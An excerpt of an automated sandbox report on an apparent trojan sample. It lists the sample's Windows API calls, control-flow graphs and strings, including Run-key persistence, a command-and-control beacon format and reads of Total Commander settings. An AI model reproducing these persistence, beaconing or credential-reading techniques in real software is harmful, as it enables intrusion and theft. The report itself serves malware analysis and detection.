                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409DE3
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409DE6
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$AllocInternet$FileFreeOpenRead
                                                                                                                                                                                                                • String ID: hOA
                                                                                                                                                                                                                • API String ID: 1355009786-3485425990
                                                                                                                                                                                                                • Opcode ID: 786a5954c9ab5f0fe889d4d88a95b872a4b6a838963cd3095893ed4ca2eaaa4a
                                                                                                                                                                                                                • Instruction ID: 638041e7f74e2b46c75c1535d5ef76f15aa532bf5b3977fbb34850ab96fc5943
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 786a5954c9ab5f0fe889d4d88a95b872a4b6a838963cd3095893ed4ca2eaaa4a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1B418B71900209FFEB119F65C844BAA7BA9FF44355F14847AF819E6292E778CE80CF54

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CountTick
                                                                                                                                                                                                                • String ID: .html$0$8@$From: $Page generated at: $Via: $^key=$^nocrypt$hOA
                                                                                                                                                                                                                • API String ID: 536389180-1762329985
                                                                                                                                                                                                                • Opcode ID: 114e4e40ed3da380897df1d948c25e04c4e8011c16955a8b70e5daac7b5a3a86
                                                                                                                                                                                                                • Instruction ID: 73e0daeea7a9f5f4b783dd0519eebdf5205f1bdf48cad4214514e0173d2ce6b9
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 114e4e40ed3da380897df1d948c25e04c4e8011c16955a8b70e5daac7b5a3a86
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 27416131A0161997CB25EBA2DC51BDE7369FF44308F0044BFB909B71C1EA78AE948F59

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 169 40a786-40a79a 170 40a7b3-40a7ea call 405511 call 4056f9 call 405529 169->170 171 40a79c 169->171 182 40a7f8-40a7fb call 4056f9 170->182 183 40a7ec-40a7f6 170->183 172 40a7a9 call 406d14 171->172 176 40a7ae-40a7b1 172->176 176->170 179 40a79e-40a7a3 Sleep 176->179 179->172 184 40a800-40a815 call 405529 182->184 183->184 188 40a823-40a826 call 4056f9 184->188 189 40a817-40a821 184->189 190 40a82b-40a846 call 405529 call 406cb5 188->190 189->190 196 40a854 call 4056f9 190->196 197 40a848-40a852 190->197 198 40a859-40a87e call 405529 call 4078cb call 40a718 196->198 197->198 206 40a880-40a892 call 40a744 198->206 209 40a894-40a899 Sleep 206->209 210 40a89f-40a8c5 call 406e69 206->210 209->210 213 40a8d2-40a8d5 210->213 214 40a8c7-40a8cc Sleep 210->214 215 40a8d7-40a8da 213->215 216 40a8dc-40a8df 213->216 214->213 215->216 217 40a8e1-40a8f8 GetProcessHeap HeapFree 215->217 216->206 216->217
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • Sleep.KERNEL32(00002710,00000000,00000000,00000000), ref: 0040A7A3
                                                                                                                                                                                                                • Sleep.KERNEL32(0000EA60,?,00000000,00000000,00000000), ref: 0040A899
                                                                                                                                                                                                                • Sleep.KERNEL32(00002710,?,?,?,?,?,00000000,00000000,00000000), ref: 0040A8CC
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0040A8E5
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,?,?,?,?,00000000,00000000,00000000), ref: 0040A8EC
                                                                                                                                                                                                                  • Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Sleep$Heap$AttemptConnectFreeInternetProcess
                                                                                                                                                                                                                • String ID: 0$confirm^rev=%s^code=%s^param=%s^os=%s
                                                                                                                                                                                                                • API String ID: 3100629401-2436734164
                                                                                                                                                                                                                • Opcode ID: c622fb37aa2467ece8f64e14a3bc52ff303aefc1e596290383a82c184368ac36
                                                                                                                                                                                                                • Instruction ID: 7defdabbc875a2827947a9af70fbac2689cb4d570e6f2fffa55db425585f7fd8
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c622fb37aa2467ece8f64e14a3bc52ff303aefc1e596290383a82c184368ac36
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C0418372D00618AACB11EBE1DC859DF73BCEF44304F10847BF505B6181EA789A558F9E

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 218 40782a-40786f GetModuleFileNameW CreateFileW 219 407871-407886 GetFileTime CloseHandle 218->219 220 407888-40788e GetTickCount 218->220 221 4078b0-4078ca call 4057b5 219->221 222 407893-40789d call 40584d 220->222 227 4078a6-4078ae 222->227 228 40789f-4078a5 222->228 227->221 227->222 228->227
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000400,00000000,UniqueNum), ref: 0040784D
                                                                                                                                                                                                                • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00407864
                                                                                                                                                                                                                • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 00407879
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00407880
                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00407888
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: File$CloseCountCreateHandleModuleNameTickTime
                                                                                                                                                                                                                • String ID: UniqueNum
                                                                                                                                                                                                                • API String ID: 1853814767-3816303966
                                                                                                                                                                                                                • Opcode ID: ad12cffd4843a03ac357a7cbd35bb16f9c39c4118ba2163eb990dc6e8f3d9bd4
                                                                                                                                                                                                                • Instruction ID: 2f8cc66c71eb5b32faf52737d8a911681d4da4e376004c23895cdbe2f04b10ac
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ad12cffd4843a03ac357a7cbd35bb16f9c39c4118ba2163eb990dc6e8f3d9bd4
                                                                                                                                                                                                                • Instruction Fuzzy Hash: AE110633419220ABD210AB65EC4CA9B7FACEF45760F004A3AF964E21D0D6349211C7AB

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 229 407e2b-407e3b 230 407e3d-407e3f call 407cd7 229->230 231 407e4e-407e7c SetFilePointer ReadFile 229->231 235 407e44-407e4c 230->235 233 407eba 231->233 234 407e7e-407e82 231->234 237 407ebc-407ebe 233->237 234->233 236 407e84 234->236 235->231 235->233 238 407e86-407e8f 236->238 238->238 239 407e91-407ea7 call 405493 238->239 239->233 242 407ea9-407eb8 call 405511 239->242 242->237
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,UniqueNum), ref: 00407E5C
                                                                                                                                                                                                                • ReadFile.KERNEL32(?,00000064,00000001,00000000), ref: 00407E74
                                                                                                                                                                                                                  • Part of subcall function 00407CD7: GetModuleFileNameW.KERNEL32(00000000,?,00001000,00000000,00000000,?,00407E44,00000001,UniqueNum), ref: 00407CF6
                                                                                                                                                                                                                  • Part of subcall function 00407CD7: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000002,00000000,?,00407E44,00000001,UniqueNum), ref: 00407D48
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: File$CreateModuleNamePointerRead
                                                                                                                                                                                                                • String ID: UniqueNum$d$hOAd$x
                                                                                                                                                                                                                • API String ID: 1528952607-1018652783
                                                                                                                                                                                                                • Opcode ID: 015ecc0cc43ae81723c1e035d0cdbf130f909c8143b489dc0bfa89a80df37f55
                                                                                                                                                                                                                • Instruction ID: 0df55d11f519ebf6f0451cc58b4543fb7278309a9039aac926228ebb90f40a66
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 015ecc0cc43ae81723c1e035d0cdbf130f909c8143b489dc0bfa89a80df37f55
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5311A531D09308AADF109B61DD05BDB3B6AAB00324F218676E612F61E0E7749D44CBAE

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 245 40ac20-40ac48 RegOpenKeyExW 246 40ac60-40ac76 RegOpenKeyExW 245->246 247 40ac4a-40ac55 call 4069c0 245->247 249 40ac78-40ac7a 246->249 250 40ac7c-40ac87 call 4069c0 246->250 252 40ac5a-40ac5e 247->252 253 40ac8e-40ac92 249->253 254 40ac8c-40ac8d 250->254 252->246 252->253 254->253
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • RegOpenKeyExW.KERNEL32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,76230900,00000400,00000000, /nomove,?,0040AB30,?,?,0040B3E5), ref: 0040AC44
                                                                                                                                                                                                                • RegOpenKeyExW.KERNEL32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,?,0040AB30,?,?,0040B3E5), ref: 0040AC72
                                                                                                                                                                                                                  • Part of subcall function 004069C0: RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,75B4E9B0,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?), ref: 004069E3
                                                                                                                                                                                                                  • Part of subcall function 004069C0: RegCloseKey.KERNEL32(00000000,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?,?,0040B3E5), ref: 004069ED
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Open$CloseQueryValue
                                                                                                                                                                                                                • String ID: /nomove$IueiOod$SOFTWARE\Microsoft\Windows\CurrentVersion\Run
                                                                                                                                                                                                                • API String ID: 3546245721-4228964922
                                                                                                                                                                                                                • Opcode ID: e183a9483fa9f7ba9bb43204af9f8e84b77f88267b9ccf7be8296576afd26502
                                                                                                                                                                                                                • Instruction ID: 3bac8edf5f415b784fe4546894dc74dc09b9405a13c640cee1cd261e7a9a2bb6
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e183a9483fa9f7ba9bb43204af9f8e84b77f88267b9ccf7be8296576afd26502
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5F01867265430EFEFF1096919D42F9A736CDB40768F210036FA00B60D1D6B6AE155779

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetCommandLineW.KERNEL32(?,0040B3E5), ref: 0040AB0A
                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000820,00000400,?,0040B3E5), ref: 0040AB44
                                                                                                                                                                                                                • CharLowerW.USER32(?,?,0040B3E5), ref: 0040AB57
                                                                                                                                                                                                                • CharLowerW.USER32(?,?,0040B3E5), ref: 0040AB60
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CharLower$CommandFileLineModuleName
                                                                                                                                                                                                                • String ID: /nomove
                                                                                                                                                                                                                • API String ID: 1338073227-1111986840
                                                                                                                                                                                                                • Opcode ID: 00c7a09b5e38cd9dc17e43fc8aab8f350de87f2bf6048177a511846302a86bad
                                                                                                                                                                                                                • Instruction ID: b8029fc6669f79c45f6caaa8ce38406425976cf3cabd4088da44db58d281c6d8
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 00c7a09b5e38cd9dc17e43fc8aab8f350de87f2bf6048177a511846302a86bad
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7CF01D7290022956DB10A7B19C05BDB72ACFF40309F0445B6AA05F2180ED78EA548F95

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 268 407cd7-407cfe call 40d5b0 GetModuleFileNameW 271 407d00-407d0b call 406cf9 268->271 272 407d0d-407d15 GetCurrentDirectoryW 268->272 274 407d1b-407d31 call 4054ed 271->274 272->274 278 407d33-407d35 274->278 279 407d36-407d60 CreateFileW 274->279 278->279
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00001000,00000000,00000000,?,00407E44,00000001,UniqueNum), ref: 00407CF6
                                                                                                                                                                                                                • GetCurrentDirectoryW.KERNEL32(00001000,?,?,00407E44,00000001,UniqueNum), ref: 00407D15
                                                                                                                                                                                                                • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000002,00000000,?,00407E44,00000001,UniqueNum), ref: 00407D48
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: File$CreateCurrentDirectoryModuleName
                                                                                                                                                                                                                • String ID: \merocz.xc6
                                                                                                                                                                                                                • API String ID: 3818821825-505599559
                                                                                                                                                                                                                • Opcode ID: 2f84b54d5be0d3dae659ee3f303fbd3ad06020502789306fc31ef9c8cba0b7e5
                                                                                                                                                                                                                • Instruction ID: bb9f2ddab4bab237696810683399403c99d26191ea9c434de7a02090ea9b9a12
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2f84b54d5be0d3dae659ee3f303fbd3ad06020502789306fc31ef9c8cba0b7e5
                                                                                                                                                                                                                • Instruction Fuzzy Hash: DA01A231904224ABE7309B569C49FEB77ADEF85710F00447FB505F20D1D6749A80CAAA

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 280 407727-407751 call 40d5b0 GetModuleFileNameW 283 407753-40776b call 4075d4 280->283 284 40776d-40776e 280->284 289 4077e1-4077ea 283->289 286 407774-4077a0 ExpandEnvironmentStringsW call 4075d4 284->286 291 4077a2-4077a5 286->291 292 4077eb-4077ee 286->292 294 4077b7-4077ba 291->294 295 4077a7-4077b5 GetLastError 291->295 293 4077e0 292->293 293->289 297 4077d2-4077dc 294->297 298 4077bc-4077c8 GetLastError 294->298 296 4077ca call 40a786 295->296 301 4077cf 296->301 297->286 300 4077de 297->300 298->296 300->293 301->297
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000400,76230900,00000400,00000000,0040B4B3,00000000), ref: 00407744
                                                                                                                                                                                                                • ExpandEnvironmentStringsW.KERNEL32(?,00000400), ref: 00407784
                                                                                                                                                                                                                • GetLastError.KERNEL32(00000004), ref: 004077A9
                                                                                                                                                                                                                  • Part of subcall function 004075D4: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,00000000,00000400), ref: 004075FC
                                                                                                                                                                                                                  • Part of subcall function 004075D4: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00407618
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: File$Create$EnvironmentErrorExpandLastModuleNameStrings
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1536607067-0
                                                                                                                                                                                                                • Opcode ID: 89cd35a4e2c2c3bd6fcfd873d8aca65b8c9597df86e0d91d22dc3db87ccf143e
                                                                                                                                                                                                                • Instruction ID: de8f4f1c442ba604be96c6aabbb627c7d922d162aa2fadd5385f895ae0141ebd
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 89cd35a4e2c2c3bd6fcfd873d8aca65b8c9597df86e0d91d22dc3db87ccf143e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: AD11E972908249AED720D7A19C81FEB739CFB44354F10483BFB95E30D0E678B945866B

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 302 4077f0-407829 call 40d530 CreateProcessW
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • _memset.LIBCMT ref: 00407800
                                                                                                                                                                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,?,?,?,?,00000400), ref: 0040781B
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CreateProcess_memset
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1177741608-0
                                                                                                                                                                                                                • Opcode ID: 0cd9a43e4f1b4c0064b4bee2692f9063eedacf03e95d61430481666f95000588
                                                                                                                                                                                                                • Instruction ID: 3694313203bda926a09df6f19e1a61ce713b6a49f930e6e3ed03be73a1123fdc
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0cd9a43e4f1b4c0064b4bee2692f9063eedacf03e95d61430481666f95000588
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1DE048B294113876DB20A6E69C0DDDF7F6CDF06694F000121BA0EE50C4E5749608C6F5

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 312 4069c0-4069fc RegQueryValueExW RegCloseKey
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,75B4E9B0,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?), ref: 004069E3
                                                                                                                                                                                                                • RegCloseKey.KERNEL32(00000000,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?,?,0040B3E5), ref: 004069ED
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CloseQueryValue
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3356406503-0
                                                                                                                                                                                                                • Opcode ID: 149707b6f704b0206dcd429f7e61dcdc4ff4cc903c0dfabc6e5b0404234ae6db
                                                                                                                                                                                                                • Instruction ID: 7cb27e63b8b96f7a1a34dd7d249ffcc2d4336ce0f7aa5f451266b78b49120899
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 149707b6f704b0206dcd429f7e61dcdc4ff4cc903c0dfabc6e5b0404234ae6db
                                                                                                                                                                                                                • Instruction Fuzzy Hash: DCE06D7A000208BBEF104F94CD09BD97BB9EB44358F208464BA00A6150D67596149B14

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 313 406d14-406d20 InternetAttemptConnect 314 406d22-406d25 313->314 315 406d26-406d41 InternetOpenW 313->315
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • InternetAttemptConnect.WININET(00000000), ref: 00406D18
                                                                                                                                                                                                                • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00406D2C
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717919310.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717956925.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000005.00000002.2717972746.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_omsecor.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Internet$AttemptConnectOpen
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2984283330-0
                                                                                                                                                                                                                • Opcode ID: 77bbdc1ab6611dce8fe5f9a2cfb0e06ed6a4e54537c27329ce6246ada380d11e
                                                                                                                                                                                                                • Instruction ID: 3045e06cac02f36cd47ad2bbc893350a3e6c997d3593ce6e368a9b0161d3b649
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 77bbdc1ab6611dce8fe5f9a2cfb0e06ed6a4e54537c27329ce6246ada380d11e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 04D05E713171312BE7345B763E48ACB2E4CDF02A61701043AF406D8090D6348851C6E8
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000008,00020002,?,00000104,SOFTWARE\Ghisler\Total Commander), ref: 00403A09
                                                                                                                                                                                                                • GetPrivateProfileStringW.KERNEL32(00000000,00000000,00000000,00000000,0000FFFF,?), ref: 00403A2C
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000008,00000C0C), ref: 00403A55
                                                                                                                                                                                                                • StrStrIW.SHLWAPI(?,?), ref: 00403ACF
                                                                                                                                                                                                                • StrStrIW.SHLWAPI(?,?), ref: 00403AE4
                                                                                                                                                                                                                • GetPrivateProfileStringW.KERNEL32(?,?,00000000,00000000,000000FF,?), ref: 00403AFF
                                                                                                                                                                                                                • GetPrivateProfileStringW.KERNEL32(?,?,00000000,000001FE,000000FF,?), ref: 00403B20
                                                                                                                                                                                                                • GetPrivateProfileStringW.KERNEL32(?,?,00000000,?,000000FF,?), ref: 00403B36
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.2717938022.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
